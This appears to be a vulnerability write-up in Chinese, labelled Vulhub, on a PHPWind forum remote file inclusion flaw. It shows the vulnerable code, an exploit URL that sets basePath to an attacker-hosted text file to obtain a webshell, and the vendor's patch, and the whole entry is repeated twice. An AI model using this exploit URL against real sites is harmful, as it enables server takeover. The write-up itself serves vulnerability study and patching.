VULHUB ™

PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。 Zoomeye Dork  apps/share/index.php 里$route和$basePath变量没有初始化,导致远程包含或者本地包含php文件,导致执行任意php代码 ``` <?php if ($route == "share") { require_once $basePath . '/action/m_share.php'; } elseif ($route == "sharelink") { require_once $basePath . '/action/m_sharelink.php'; } ?> ``` 这个漏洞好象不太需要分析!!!! 我建议写这个代码的人应该扣除年终奖... 漏洞利用 浏览器访问 ``` http://XXX/bbs/apps/share/index.php?route=groups&basePath=http:// XXX.cn/gm.txt? ``` 访问后就可以包含文件并获得webshell(问号要带上，不然会失败) phpwind 7.5 已经在这个补丁的同时'修补'了 http://www.phpwind.net/read-htm-tid-914851.html ``` <?php !function_exists('readover') && exit('Forbidden'); if ($route == "share") { require_once $basePath . '/action/m_share.php'; } elseif ($route == "sharelink") { require_once $basePath . '/action/m_sharelink.php'; } ?> ```

PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。 Zoomeye Dork  apps/share/index.php 里$route和$basePath变量没有初始化,导致远程包含或者本地包含php文件,导致执行任意php代码 ``` <?php if ($route == "share") { require_once $basePath . '/action/m_share.php'; } elseif ($route == "sharelink") { require_once $basePath . '/action/m_sharelink.php'; } ?> ``` 这个漏洞好象不太需要分析!!!! 我建议写这个代码的人应该扣除年终奖... 漏洞利用 浏览器访问 ``` http://XXX/bbs/apps/share/index.php?route=groups&basePath=http:// XXX.cn/gm.txt? ``` 访问后就可以包含文件并获得webshell(问号要带上，不然会失败) phpwind 7.5 已经在这个补丁的同时'修补'了 http://www.phpwind.net/read-htm-tid-914851.html ``` <?php !function_exists('readover') && exit('Forbidden'); if ($route == "share") { require_once $basePath . '/action/m_share.php'; } elseif ($route == "sharelink") { require_once $basePath . '/action/m_sharelink.php'; } ?> ```